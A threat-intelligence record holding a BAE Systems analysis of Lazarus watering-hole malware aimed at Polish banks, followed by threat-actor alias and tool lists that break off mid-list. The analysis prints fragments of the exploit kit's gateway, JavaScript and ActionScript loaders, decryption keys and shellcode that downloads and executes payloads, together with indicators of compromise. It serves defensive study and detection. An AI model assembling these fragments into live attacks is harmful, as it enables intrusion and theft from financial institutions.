{
	"id": "c094847c-9fd5-4c4d-9638-89e3f87a6c1f",
	"created_at": "2026-04-06T00:06:56.028136Z",
	"updated_at": "2026-04-10T03:38:19.056566Z",
	"deleted_at": null,
	"sha1_hash": "d23c311546282942a68abe406ebf2ee8c2c7fed6",
	"title": "Lazarus’ False Flag Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 464303,
	"plain_text": "Lazarus’ False Flag Malware\r\nArchived: 2026-04-05 16:51:15 UTC\r\nWritten by Sergei Shevchenko and Adrian Nish\r\nBACKGROUND\r\nWe continue to investigate the recent wave of attacks on banks using watering-holes on at least two financial\r\nregulator websites as well as others. Our initial analysis of malware disclosed in the BadCyber blog hinted at the\r\ninvolvement of the 'Lazarus' threat actor. Since the release of our report, more samples have come to light, most\r\nnotably those described in the Polish language niebezpiecznik.pl blog on 7 February 2017.\r\nMD5 hash Filename Compile Time File Info Submitted\r\n9216b29114fb6713ef228370cbfe4045 srservice.chm N/A N/A N/A\r\n8e32fccd70cec634d13795bcb1da85ff srservice.hlp N/A N/A N/A\r\ne29fe3c181ac9ddbb242688b151f3310 srservice.dll\r\n2016-10-22\r\n08:08\r\nWin64 DLL\r\n78 KB\r\n2017-01-28\r\n11:58\r\n9914075cc687bdc352ee136ac6579707 fdsvc.exe\r\n2016-08-26\r\n04:19\r\nWin64 EXE\r\n60 KB\r\n2017-02-05\r\n15:14\r\n9cc6854bc5e217104734043c89dc4ff8 fdsvc.dll\r\n2016-08-26\r\n04:11\r\nEncrypted\r\n470 KB\r\n2017-02-05\r\n15:15\r\nOf the hashes provided, only three samples could be found in public malware repositories. All three had been\r\nsubmitted from Poland in recent weeks.\r\nIn the analysis section below we examine these and the ‘false flag’ approach employed by the attackers in order to\r\nspoof the origin of the attack. 
The same ‘false flag’ approach was also found in the SWF-based exploit mentioned in our previous blogpost:\r\nMD5 hash | Filename | File Info | Submitted\r\n6dffcfa68433f886b2e88fd984b4995a | cambio.swf | Adobe Flash | 2016-12-07 23:15\r\nHere we’ll analyse these files as well as shed further light on the watering-hole exploit kit code itself, in the hope that this aids further detection and network defence.\r\nANALYSIS\r\nSample #1 – srservice.chm\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html\r\nPage 1 of 16\n\nMost likely, this file is an encrypted backdoor that is decrypted and injected by a DLL loader. The filename srservice.chm is consistent with the method in which a known Lazarus toolkit module constructs CHM and HLP file names:\r\n%SYSTEMROOT%\\Help\\%MODULE_NAME%.chm\r\n%SYSTEMROOT%\\Help\\%MODULE_NAME%.hlp\r\nSample #2 – srservice.hlp\r\nMost likely, this file is an encrypted configuration file, which is decrypted and loaded by sample #1 (srservice.chm).\r\nSample #3 – srservice.dll\r\nThis DLL loads, decrypts and injects the 'CHM' file into the system lsass.exe process.\r\nSample #4 – fdsvc.exe\r\nThis file is a command-line tool that accepts several parameters, such as the encrypted file name and a process ID. The tool reads and decrypts the specified file, and then injects it into the specified process or into the system process explorer.exe.\r\nThe encryption consists of a running XOR, followed by RC4, using the 32-byte RC4 key below:\r\nA6 EB 96 00 61 B2 E2 EF 0D CB E8 C4 5A F1 66 9C\r\nA4 80 CD 9A F1 2F 46 25 2F DB 16 26 4B C4 3F 3C\r\nSample #5 – fdsvc.dll\r\nThe file fdsvc.dll is an encrypted file, successfully decrypted into a valid DLL (MD5: 889e320cf66520485e1a0475107d7419) by the aforementioned executable fdsvc.exe.\r\nOnce decrypted, it represents itself as a bot that accepts the C\u0026C name and port number(s) as a string parameter that is used to call the DLL. 
The parameter is encoded with an XOR loop that uses the XOR key cEzQfoPw.\r\nMultiple C\u0026C servers can be delimited with the ' | ' character, and port numbers are delimited from the C\u0026C servers with the ':' character.\r\nOnce the bot has established communication with the remote C\u0026C, it uses several transliterated Russian words to either indicate the state of its communication or issue backdoor commands, such as:\r\nWord | State/Backdoor Command\r\n\"Nachalo\" | start communication session\r\n\"ustanavlivat\" | handshake state\r\n\"poluchit\" | receive data\r\n\"pereslat\" | send data\r\n\"derzhat\" | maintain communication session\r\n\"vykhodit\" | exit communication session\r\nThe binary protocol is custom. For example, during the \"ustanavlivat\" (handshake) mode, the bot accepts 4 bytes, which are then decrypted. The decryption is a loop that involves multiple XOR operations performed over the received data. Once decrypted, the 4 bytes indicate the size of the next data chunk to be received.\r\nThe next received data chunk is also decrypted, and its contents checked to see whether it's one of the backdoor commands.\r\nFor example, the \"poluchit\" command instructs the bot to receive a file, and the \"pereslat\" (send) command instructs the bot to upload a file. The received \"poluchit\" command may also contain a URL, marked with another transliterated Russian word, \"ssylka\" (link). In this case, the remote file is fetched in a separate thread. If a received data chunk contains the command \"vykhodit\", the bot quits its backdoor loop.\r\nThe bot implements the SSL/TLS protocol, and is based on the source code of \"Curl v7.49.1\". 
Hence, it is able to transfer files via HTTP, HTTPS, FTP, SMTP and many other protocols, with full support for user/password authentication (Basic, Digest, NTLM, Negotiate, Kerberos), proxies and SSL certificates.\r\nRussian language used in fdsvc.dll\r\nIn spite of some 'Russian' words being used, it is evident that the malware author is not a native Russian speaker. Of our previous examples, five of the commands were likely produced by an online translation. Below we provide the examples and the correct analogues for reference:\r\nWord | Type of error | Correct analogue\r\n\"ustanavlivat\" | omitted sign at the end, verb tense error | \"ustanovit'\" or \"ustanoviti\"\r\n\"poluchit\" | omitted sign at the end | \"poluchit'\" or \"poluchiti\"\r\n\"pereslat\" | omitted sign at the end | \"pereslat'\" or \"pereslati\"\r\n\"derzhat\" | omitted sign at the end | \"derzhat'\" or \"derzhati\"\r\n\"vykhodit\" | omitted sign at the end, verb tense error | \"vyiti\"\r\nAnother example is \"kliyent2podklyuchit\". This is most likely the result of an online translation of \"client2connect\" (which means 'client-to-connect'). In this case, the two words \"client\" and \"connect\" were translated separately, then transliterated from the Russian pronunciation form into the Latin alphabet and finally joined to produce \"kliyent2podklyuchit\".\r\nSuch a result may look impressive to the bot's author, but would be difficult to understand for native Russian speakers.\r\nHere we provide an example of translating the word \"client\" into Russian - the word \"kliyent\" here only demonstrates phonetic pronunciation, not how it's actually written in a transliterated form. 
When formed using the Latin alphabet, it would actually be written \"client\" or \"klient\".\r\nDue to such inconsistencies, we conclude that the Russian language is likely used as a decoy tactic, in order to spoof the malware’s country of origin.\r\nSample #6 – cambio.swf\r\nDuring the investigation of the watering-hole incident, the owner of a compromised website shared with us a malicious implant that was added to the site, presumably by using an exploit against JBoss 5.0.0.\r\nThe script is called view_jsp.java and is accessed from the watering-hole website as view.jsp. This script is responsible for serving cambio.swf.\r\nThe infection starts from a primary website being compromised so that its visitors are redirected to a secondary website, calling its view.jsp script from an added IFrame. The initial request contains the parameter pagenum set to 1, such as:\r\n\"GET /[PATH]/view.jsp?pagenum=1 HTTP/1.1\"\r\nThis begins the profiling and filtering to identify potential victims. For example, the script then checks to see if the client's IP is black-listed. If so, the initial request is rejected.\r\nNext, the script checks if the client’s IP is white-listed (i.e. targeted). If not white-listed, it is also rejected. Hence, unless the visitor’s IP is on the attackers’ list, the script will not attempt to infect their machine. 
This helps the infected websites stay undetected for a relatively long period of time, as they only serve exploits to the selected targets.\r\nIn the next stage of the script, it builds and serves back to the client an HTML page with embedded JavaScript that detects the type of the client’s browser (Internet Explorer, Google Chrome, Firefox, Safari, or Opera), OS version, and the loaded plugins, such as Adobe Flash and Microsoft Silverlight.\r\nThe script executed on the client side then builds a form, and submits it back to the gateway script, as shown below:\r\nThe submitted form specifies the pagenum parameter to be set to 2, to advance the script to the next step:\r\nOnce the script accepts the incoming request and finds the form's pagenum value is 2, it reads other fields from the submitted form and decides which exploit to serve back to the client.\r\nAt the time of writing, the exploit kit is known to serve back two exploits, for Adobe Flash and Microsoft Silverlight, though these could be expanded upon as needed.\r\nThe exploits can be individually enabled or disabled by the attackers with the standalone file config.dat. For example, to enable both exploits (flag=1), the contents of this file can be set to:\r\nwhere 2016-0034 identifies the Silverlight exploit, and 0000-0001 is the Flash exploit.\r\nIf the script detects that the submitted form contains a non-empty version of the Silverlight browser plugin, it will generate and serve back a Silverlight exploit. If the submitted form has a non-empty version of the Adobe Flash browser plugin, the script will generate and serve back the Flash exploit. 
If the client has both plugins loaded within the browser, then the script will serve the Flash exploit only.\r\nNOTE: the script only serves the Flash exploit if the browser is Internet Explorer.\r\nThe exploits are generated by the functions:\r\n  •   genExp_20160034() – to generate the Silverlight exploit\r\n  •   genExp_00000001() – to generate the Flash exploit\r\nThe latter is explained in further detail below. First, the script builds a URL string named download_url:\r\nString PARAMNAME_UID = \"uid\";\r\nString PARAMNAME_PAGENUM = \"pagenum\";\r\nString PARAMNAME_EXPLOITID = \"eid\";\r\nString PARAMNAME_STATUS = \"s\";\r\nString PARAMNAME_DATA = \"data\";\r\n\r\ndownload_url = request.getRequestURL() +\r\n    \"?\" + PARAMNAME_UID + \"=\" + uid +\r\n    \"\u0026\" + PARAMNAME_PAGENUM + \"=3\" +\r\n    \"\u0026\" + PARAMNAME_EXPLOITID +\r\n    \"=\" + exploit.get(\"eid\");\r\n...\r\ndownload_url = download_url +\r\n    \"\u0026\" + PARAMNAME_STATUS + \"=2\" +\r\n    \"\u0026\" + PARAMNAME_DATA + \"=\";\r\nFor example, the URL string may look like:\r\nhttp://[WEB_SITE]/view.jsp?uid=30304811\u0026pagenum=3\u0026eid=00000002\u0026s=2\u0026data=\r\nNote that the pagenum parameter of the URL has now advanced to 3 (the third step of the view.jsp execution).\r\nThis URL string will be embedded by the genExp_00000001() function into the body of the shellcode.\r\nThe output of the genExp_00000001() function is JavaScript that has the following format – this script will be executed inside the client's browser:\r\nvar laskfji = 'PGh0bWw+..'; // long string here\r\nasdlfkj = function(s) {\r\n    // base64-decode string s\r\n};\r\nvar polkio = asdlfkj(laskfji);\r\nvar poikea = 'document.write(polkio);';\r\neval(poikea);\r\nOnce the string s is base64-decoded by the client-side JavaScript, it will look like a Flash object embedded 
into HTML:\r\nAs seen in the Flash object parameters, the SWF object is served from the website’s path:\r\nHowever, the SWF object is also accompanied by 2 extra parameters:\r\nSWF Parameter | Value\r\n\"shell\" | 558BEC83EC388D45C8C745F...\r\n\"Health\" | polki89jdm#ks@\r\nBy looking into the decompiled cambio.swf file, its ActionScript reveals that the SWF file indeed expects 2 parameters: Health and shell.\r\nThe value of Health is used as an XOR key to decode the binary blob orinBin, which is included in the SWF file. This blob is then loaded with loadBytes(), as shown below:\r\nobjLoader = new Loader();\r\nthis.params = loaderInfo.parameters;\r\n...\r\nvar key:String = params[\"Health\"] as String;\r\nvar pShell:String = params[\"shell\"] as String;\r\nvar objShellData:SharedObject = SharedObject.getLocal(\"Exp_Data\");\r\nobjShellData.clear();\r\nobjShellData.data.shell = pShell;\r\nobjShellData.flush();\r\nvar blob:ByteArray = new orinBin() as ByteArray;\r\nvar i:int = 0;\r\nwhile(i \u003c blob.length)\r\n{\r\n    blob[i] = blob[i] ^ key.charCodeAt(i % key.length);\r\n    i++;\r\n}\r\nblob.position = 0;\r\nobjLoader.contentLoaderInfo.addEventListener(\"complete\",fncomp);\r\nobjLoader.loadBytes(blob);\r\nBelow is the binary blob orinBin as seen within the SWF file:\r\nBy knowing the value of the Health parameter, it is now possible to use it as an XOR key to decode the orinBin blob within the SWF code.\r\nOnce decrypted, the orinBin blob presents another SWF file. 
This time, it contains 3 encrypted blobs within: bin22, bin23, and bin24, seen below:\r\nThe code decrypts the blobs with RC4, using \"littleEndian\" as the RC4 key. These blobs also turn out to be SWF files that contain the SWF exploit code.\r\nInternally, the ActionScript also uses transliterated Russian words, similar to the tactic seen in the bot code:\r\nTransliterated Russian words used in AS | Translated from Russian\r\nPodgotovkaskotiny | Preparation of farm animals\r\ngeigeigei3raza | Hey, hey, hey 3 times\r\nchainik | Dummy (a stupid person)\r\nchainikaddress | Dummy's address\r\npoishemdatu | Let’s search for data\r\npoiskvpro | Searching in 'pro'\r\nvyzov_chainika | Calling the dummy (a stupid person)\r\ndaiadreschainika | Get address of the dummy\r\nrunskotina | Execute farm animals\r\nbabaLEna | Old woman Lena\r\nAs seen in the table, while the words are technically Russian, their usage is out of context.\r\nIn one code fragment, the ActionScript contains both \"chainik\" and \"dummy\":\r\nprivate function put_dummy_args(param1:*) : *\r\n{\r\n    return chainik.call.apply(null,param1);\r\n}\r\nprivate function vyzov_chainika() : *\r\n{\r\n    return chainik.call(null);\r\n}\r\nAs such, it is obvious that the word \"dummy\" has been translated into \"chainik\". However, the word \"chainik\" in Russian slang (with the literal meaning of \"a kettle\") is used to describe an unsophisticated person, a newbie; while the word \"dummy\" in the exploit code is used to mean a \"placeholder\" or an \"empty\" data structure/argument.\r\nIn the same way, it is likely the word \"farm animals\" was originally used to represent \"a beast\". 
Yet, it has been translated into a word that is only synonymous with \"the beast\" in a certain context.\r\nAs a result, they have used the words \"farm animals\" across the shellcode instead of \"beast\", which makes little sense.\r\nAs in the case of sample #5 (fdsvc.dll), it is likely that this loose Russian translation, evidently performed by a non-Russian speaker, is intended to spoof the malware origin.\r\nShellcode\r\nThe SWF's ActionScript then loads and executes the shellcode that was passed to the SWF file. As with the Health parameter, by having access to the server-side code it is now possible to analyse what shellcode has been served to be executed via the SWF file.\r\nThe shellcode consists of 2,372 bytes of Win32 code (in fact, 2,369 bytes padded with three zero bytes to make it 4-byte aligned).\r\nThe shellcode passed via the shell parameter consists of two parts:\r\n  •  The first part of the shellcode (818 bytes) creates a hidden process of notepad.exe. 
It then injects the second part of the shellcode into it using the VirtualAlloc() and WriteProcessMemory() APIs, and finally it runs the injected code with the CreateRemoteThread() API.\r\n  •  The second part of the shellcode (1,551 bytes) is encoded with XOR 0x57:\r\nseg000:00000316 mov ecx, 1551 ; counter\r\nseg000:0000031B mov ebx, 57h ; XOR key\r\nseg000:00000320 loop:\r\nseg000:00000320 xor [eax], ebx\r\nseg000:00000322 dec ecx ; decrement counter\r\nseg000:00000323 inc eax ; advance pointer\r\nseg000:00000324 test ecx, ecx\r\nseg000:00000326 jnz short loop\r\nIt's worth noting that both parts of the shellcode load the APIs similarly to all other tools from the Lazarus toolset, e.g.:\r\nurlmon_dll='mlrU';//Urlm\r\nurlmon_dll_4='d.no';//on.d\r\nurlmon_dll_8='ll';//ll\r\nURLDownloadToFileW='DLRU';//URLD\r\nURLDownloadToFileW_4='lnwo';//ownl\r\nURLDownloadToFileW_8='Tdao';//oadT\r\nURLDownloadToFileW_12='liFo';//oFile\r\nURLDownloadToFileW_16='We';//eW\r\nhLib=LoadLibrary(\u0026urlmon.dll);\r\nptr[8]=(*(int)ptr[4])(hLib,//ptr[4]-\u003eGetProcAddress\r\n    \u0026URLDownloadToFileW);\r\nOnce decoded, the second part of the shellcode reads the URL embedded at the end, then downloads and saves a file under a temporary file name, using the prefix \"tmp\".\r\nNext, it reads the temporary file into memory and decrypts it with the following XOR loop, starting from the 318th byte:\r\nfor (i = 317; i \u003c file_size; ++i )\r\n{\r\n    buffer[i] ^= 0xCC ^ ((buffer[i] ^ 0xCC) \u003e\u003e 4);\r\n}\r\nNext, it makes the decoded data executable by assigning it the PAGE_EXECUTE_READWRITE memory protection mode, and calls it, as shown below:\r\n
(*(void)(ptr[68]))(buffer+318,  //ptr[68]-\u003eVirtualProtect\r\n    file_size-318,              //skip the first 318 bytes\r\n    PAGE_EXECUTE_READWRITE,\r\n    \u0026oldProtect);\r\n((void(*)(void))(buffer+318))();  //CALL from the 318th byte\r\nThis way, the 2nd part of the shellcode downloads a binary from the same gateway script as before. pagenum=3 means it's the 3rd step – the step of serving the next chunk of the shellcode.\r\nTo understand the next step we need to go back to the gateway script to see how it processes the pagenum=3 request.\r\nWhen the script receives a pagenum=3 request, it checks the 's' URL parameter ('status'). Initially, this parameter is set to 2 ('s=2', as seen in the aforementioned URL embedded into the SWF exploit).\r\nThus, the script will read and output the contents of 2 files stored on the web server:\r\nfiles/mark180789172360.ico\r\nfiles/back283671047171.dat\r\nThe first file is likely a valid ICO file, is 318 bytes in size, and its contents are not encoded (hence the reason why the shellcode skips the first 318 bytes, and only decodes the rest).\r\nThe second file is the 3rd chunk of the shellcode, and its contents are encoded.\r\nIn addition to these 2 files, the output is appended with a URL. This time, it will specify the pagenum parameter set to 3, but the status parameter s will now be set to 3. 
For example, the URL may look like:\r\nhttp://[WEB_SITE]/view.jsp?uid=30304811\u0026pagenum=3\u0026s=3\r\nThe appended URL will then be encoded the same way as the file back283671047171.dat:\r\nfor (int i = 0; i \u003c len + 9; i++)\r\n{\r\n    byte var = b[i];\r\n    byte temp = (byte)((var \u003e\u003e 4) \u0026 0x0F);\r\n    var = (byte)(var ^ temp);\r\n    var = (byte)(var ^ 0xCC);\r\n    b[i] = var;\r\n}\r\nThis way, the encoded URL becomes an integral part of the 3rd part of the shellcode – the same way as the 2nd part of the shellcode was appended with a URL.\r\nFollowing that, the script serves back a blob that consists of three parts:\r\n  •   files/mark180789172360.ico, not encoded (318 bytes)\r\n  •   files/back283671047171.dat, encoded\r\n  •   download URL, encoded\r\nIt is served back as a binary file, disguised as an icon file probg[RANDOM].ico, probably in an attempt to bypass network sniffers (in other words, the encrypted shellcode is served appended to a valid icon file):\r\nresponse.setHeader(\"Accept-Ranges\", \"bytes\");\r\nresponse.setHeader(\"Content-Length\", String.format(\"%d\", response_len));\r\nresponse.setHeader(\"Content-Disposition\", \"attachment;filename=\\\"probg\" + rand.nextInt(9000) + 10000 + \".ico\\\"\");\r\nresponse.setHeader(\"Content-Type\", \"application/octet-stream\");\r\nOnce this 3rd part of the shellcode is served back to the shellcode that runs on the client side, it will skip the first 318 bytes, decode the rest and execute it. 
This will invoke another binary download – this time identified with the status value of 3 ('s=3').\r\nThe new binary is generated by the view.jsp script and is almost identical to the 3rd part of the shellcode. The only difference is that the binary blob consists of these files:\r\n  •   files/mark180789172360.ico, not encoded (318 bytes), as before\r\n  •   files/meml102783047891.dat, encoded\r\nThe 2nd file is now different, and the URL is no longer appended. The reason why the new binary does not need the URL embedded may be that this binary contains an actual malicious executable, detached, decoded, and executed by the shellcode, thus leading to a full compromise of the victim.\r\nIndeed, as seen in the web log below, the last GET request with the pagenum=3 and s=3 parameters is served with a 123,710-byte response – large enough to accommodate a PE executable:\r\n\"GET /[PATH]/view.jsp?pagenum=1 HTTP/1.1\" 200 66148\r\n\"POST /[PATH]/view.jsp HTTP/1.1\" 200 13991\r\n\"GET /[PATH]/view.jsp?uid=30304811\u0026pagenum=3\u0026eid=00000002\u0026s=2\u0026data= HTTP/1.1\" 200 4642\r\n\"GET /[PATH]/view.jsp?uid=30304811\u0026pagenum=3\u0026s=3 HTTP/1.1\" 200 123710\r\nNOTE: At the time of analysis, the ICO/DAT files were not available. Hence, their contents remain unknown.\r\nOverall Scheme\r\nThe following scheme illustrates the steps outlined above:\r\nCONCLUSIONS\r\nHere we have analysed further files from the recent watering-hole attacks directed at Polish financial institutions and others. Evidently, the Lazarus group are continuing their campaign targeting banking networks. 
Their watering-hole mechanism is fairly sophisticated – its multiple stages are designed to complicate analysis of its malware distribution and, at the same time, stay undetected for as long as possible.\r\nBecause of the previously disclosed attribution links, the group are also resorting to some trickery. Through reverse-engineering, we can see the use of many Russian words that have been translated incorrectly. In some cases the inaccurate translations have transformed the meaning of the words entirely. This strongly implies that the authors of this attack are not native Russian speakers and, as such, the use of Russian words appears to be a 'false flag'. Clearly the group behind these attacks are evolving their modus operandi in terms of capabilities – but also it seems they’re attempting to mislead investigators who might jump to conclusions in terms of attribution.\r\nAPPENDIX A: INDICATORS OF COMPROMISE\r\nMD5 Hashes:\r\n9cc6854bc5e217104734043c89dc4ff8\r\n9914075cc687bdc352ee136ac6579707\r\ne29fe3c181ac9ddbb242688b151f3310\r\n9216b29114fb6713ef228370cbfe4045\r\n8e32fccd70cec634d13795bcb1da85ff\r\n889e320cf66520485e1a0475107d7419\r\n6dffcfa68433f886b2e88fd984b4995a\r\nFilenames:\r\ncambio.swf\r\ncambio.xap\r\nmark180789172360.ico\r\nmeml102783047891.dat\r\nback283671047171.dat\r\nURLs:\r\nview.jsp?pagenum=1\r\nview.jsp?uid=\r\nSource: https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html"
	],
	"report_names": [
		"lazarus-false-flag-malware.html"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
